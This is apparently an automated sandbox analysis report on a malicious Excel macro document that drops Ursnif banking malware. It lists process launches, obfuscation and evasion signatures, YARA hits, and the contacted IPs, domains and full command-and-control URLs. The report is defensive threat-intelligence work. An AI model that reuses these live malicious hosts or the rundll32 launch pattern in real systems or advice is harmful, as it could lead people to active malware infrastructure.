Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj2,DllRegisterServer Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:620 CREDAT:275457 /prefetch:2 Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3064 CREDAT:275457 /prefetch:2 Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:972 CREDAT:275457 /prefetch:2 Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:972 CREDAT:603152 /prefetch:2 Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:972 CREDAT:1520647 /prefetch:2 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Data Obfuscation:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001745 LoadLibraryA,GetProcAddress, 7_2_10001745
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E6194 push eax; mov dword ptr [esp], 00000004h 7_2_001E61AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E6194 push esi; mov dword ptr [esp], 00001000h 7_2_001E61B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E6194 push 00000000h; mov dword ptr [esp], ebp 7_2_001E6267
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E348F push dword ptr [ebp-10h]; mov dword ptr [esp], ecx 7_2_001E34A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E348F push dword ptr [ebp-0Ch]; mov dword ptr [esp], ecx 7_2_001E3632
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E348F push 00000000h; mov dword ptr [esp], edx 7_2_001E37FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E348F push edx; mov dword ptr [esp], 00000002h 7_2_001E384A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E348F push 00000000h; mov dword ptr [esp], ecx 7_2_001E38D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1918 push dword ptr [ebp-24h]; mov dword ptr [esp], ebx 7_2_001E1927
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1918 push 00000000h; mov dword ptr [esp], ecx 7_2_001E1B10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1918 push 00000000h; mov dword ptr [esp], esi 7_2_001E1CD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1918 push 00000000h; mov dword ptr [esp], esi 7_2_001E1D37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1918 push dword ptr [ebp-20h]; mov dword ptr [esp], esi 7_2_001E1DC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1918 push 00000000h; mov dword ptr [esp], ebp 7_2_001E1E4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1918 push dword ptr [ebp-20h]; mov dword ptr [esp], ecx 7_2_001E1F23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1000 push 00000000h; mov dword ptr [esp], ebp 7_2_001E110A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1000 push 00000000h; mov dword ptr [esp], ebx 7_2_001E1146
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1000 push 00000000h; mov dword ptr [esp], ebp 7_2_001E118E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1000 push ebp; mov dword ptr [esp], 00000002h 7_2_001E1270
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1000 push dword ptr [ebp-08h]; mov dword ptr [esp], ecx 7_2_001E12E7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E463F push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax 7_2_001E4648
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E463F push ebp; mov dword ptr [esp], 00000003h 7_2_001E46A2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E463F push ebx; mov dword ptr [esp], 00F00000h 7_2_001E46AB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E6633 push dword ptr [ebp-08h]; mov dword ptr [esp], eax 7_2_001E66E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E6633 push dword ptr [ebp-04h]; mov dword ptr [esp], ecx 7_2_001E6736
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E6424 push dword ptr [ebp-08h]; mov dword ptr [esp], esp 7_2_001E644D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E6424 push 00000000h; mov dword ptr [esp], edi 7_2_001E64EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E6424 push 00000000h; mov dword ptr [esp], ecx 7_2_001E657A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E6424 push 00000000h; mov dword ptr [esp], ebp 7_2_001E65D2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E6424 push dword ptr [ebp-08h]; mov dword ptr [esp], eax 7_2_001E66E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E6424 push dword ptr [ebp-04h]; mov dword ptr [esp], ecx 7_2_001E6736

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\fikftkm.thj2 Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gif Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\fikftkm.thj2 Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gif Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\fikftkm.thj2 Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\fikftkm.thj2 Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000007.00000002.2424277771.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.10000000.11.unpack, type: UNPACKEDPE
Yara detected Ursnif
Source: Yara match File source: 00000007.00000002.2425909457.0000000002DD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2230212772.0000000002C5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2368154248.0000000002B5D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2416009611.0000000002A5F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2996, type: MEMORY
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gif Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_003112D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 7_2_003112D4

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001745 LoadLibraryA,GetProcAddress, 7_2_10001745
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E2DF5 or edx, dword ptr fs:[00000030h] 7_2_001E2DF5

HIPS / PFW / Operating System Protection Evasion:

barindex
Yara detected hidden Macro 4.0 in Excel
Source: Yara match File source: document-1771131239.xls, type: SAMPLE
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj2,DllRegisterServer Jump to behavior
Yara detected Xls With Macro 4.0
Source: Yara match File source: document-1771131239.xls, type: SAMPLE
Source: rundll32.exe, 00000006.00000002.2424280134.0000000000760000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2424493399.0000000000960000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: rundll32.exe, 00000006.00000002.2424280134.0000000000760000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2424493399.0000000000960000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000006.00000002.2424280134.0000000000760000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2424493399.0000000000960000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0031269C cpuid 7_2_0031269C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000102F GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 7_2_1000102F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0031269C RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 7_2_0031269C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001850 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 7_2_10001850
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000007.00000002.2424277771.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.10000000.11.unpack, type: UNPACKEDPE
Yara detected Ursnif
Source: Yara match File source: 00000007.00000002.2425909457.0000000002DD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2230212772.0000000002C5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2368154248.0000000002B5D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2416009611.0000000002A5F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2996, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000007.00000002.2424277771.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.10000000.11.unpack, type: UNPACKEDPE
Yara detected Ursnif
Source: Yara match File source: 00000007.00000002.2425909457.0000000002DD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2230212772.0000000002C5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2368154248.0000000002B5D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2416009611.0000000002A5F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2996, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 381643 Sample: document-1771131239.xls Startdate: 04/04/2021 Architecture: WINDOWS Score: 100 47 urs-world.com 2->47 65 Multi AV Scanner detection for domain / URL 2->65 67 Found malware configuration 2->67 69 Multi AV Scanner detection for submitted file 2->69 71 13 other signatures 2->71 8 EXCEL.EXE 88 48 2->8         started        13 iexplore.exe 1 36 2->13         started        15 iexplore.exe 3 34 2->15         started        17 iexplore.exe 1 33 2->17         started        signatures3 process4 dnsIp5 49 accesslinksgroup.com 192.185.129.4, 443, 49170 UNIFIEDLAYER-AS-1US United States 8->49 51 mundotecnologiasolar.com 162.241.62.4, 443, 49168 UNIFIEDLAYER-AS-1US United States 8->51 53 3 other IPs or domains 8->53 41 C:\Users\user\fikftkm.thj2, PE32 8->41 dropped 43 C:\Users\user\AppData\Local\...\0104[1].gif, PE32 8->43 dropped 45 C:\Users\user\fikftkm.thj, HTML 8->45 dropped 75 Document exploit detected (UrlDownloadToFile) 8->75 19 rundll32.exe 8->19         started        21 rundll32.exe 8->21         started        23 rundll32.exe 8->23         started        36 2 other processes 8->36 25 iexplore.exe 14 13->25         started        28 iexplore.exe 17 13->28         started        30 iexplore.exe 13->30         started        32 iexplore.exe 13 15->32         started        34 iexplore.exe 43 17->34         started        file6 signatures7 process8 dnsIp9 38 rundll32.exe 19->38         started        55 urs-world.com 185.186.244.95, 49194, 49195, 49196 WEBZILLANL Netherlands 28->55 57 under17.com 185.243.114.196, 80 ACCELERATED-ITDE Netherlands 32->57 59 prda.aadg.msidentity.com 34->59 61 login.microsoftonline.com 34->61 63 a.privatelink.msidentity.com 34->63 process10 signatures11 73 Writes registry values via WMI 38->73
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
207.174.213.126
 vts.us.com United States
394695 PUBLIC-DOMAIN-REGISTRYUS false
162.241.62.4
 mundotecnologiasolar.com United States
46606 UNIFIEDLAYER-AS-1US false
5.100.155.169
 ponchokhana.com United Kingdom
394695 PUBLIC-DOMAIN-REGISTRYUS false
185.243.114.196
 under17.com Netherlands
31400 ACCELERATED-ITDE true
198.50.218.68
 comosairdoburaco.com.br Canada
16276 OVHFR false
192.185.129.4
 accesslinksgroup.com United States
46606 UNIFIEDLAYER-AS-1US true
185.186.244.95
 urs-world.com Netherlands
35415 WEBZILLANL true

Contacted Domains

Name IP Active
mundotecnologiasolar.com 162.241.62.4 true
urs-world.com 185.186.244.95 true
accesslinksgroup.com 192.185.129.4 true
ponchokhana.com 5.100.155.169 true
under17.com 185.243.114.196 true
vts.us.com 207.174.213.126 true
comosairdoburaco.com.br 198.50.218.68 true
login.microsoftonline.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://urs-world.com/joomla/DzJ1zVBWb/1fmYW7HPNqRQhz6Za_2F/CEQgEHh67hkPdvwOSdi/nEqyJXm1CwTWVs2C_2Fr_2/BvjUBKxN9qSpN/cMrTRJ9N/ryJsB4qGY2XHLtxrLDi6xNR/Qw5QsDCu2a/1byqzLlxunqNEdxwm/2jiPBdqZB0a1/q3egY2VhZv3/_2B8x5gL2kXG3P/aL1YXODRbtNtTkBrj3PS7/G.akk false
  • Avira URL Cloud: safe
 unknown
http://urs-world.com/joomla/nFzk0Q7K/E1_2F1CEOHcU967kDpuCuCt/FPWRV6etYO/3uHaVD2_2B5fz4cnT/KUnSOvHj3DDx/LEjym6jOHzl/FeVIuhKblVVnxm/VI6rPV0WA0nCSJBKKjggZ/tlqJBc8y5_2Bbir_/2BCa9ubsQQgGaAg/T_2BNOyNXybfs33Qg4/rm7s6e4PI/6eyckn37N5jlypeo4jei/kAPiG95T_2BrCVeX6k0/F0E8zUcKkiS/aU.akk false
  • Avira URL Cloud: safe
 unknown
http://urs-world.com/joomla/3aDSi90Odm4t/ZQseS7mEKQ6/SSE8Q3crCb0l7w/wIvpan0x1HXuZM3ORESMa/ajJiFPV258iNRovg/KQl9frzLJWGuawc/zcW8IHCp_2F8n02ZSX/SkuilVzI4/iu_2BjoqlDfmKu_2BuVf/kGitIl_2Bi7_2Fz9R6X/Y0sd4k8W3UrfPrzXwVLvdK/7G4iHN0OcM5_2/FPqyROS_/2BKDOK08.akk false
  • Avira URL Cloud: safe
 unknown
http://urs-world.com/favicon.ico false
  • Avira URL Cloud: safe
 unknown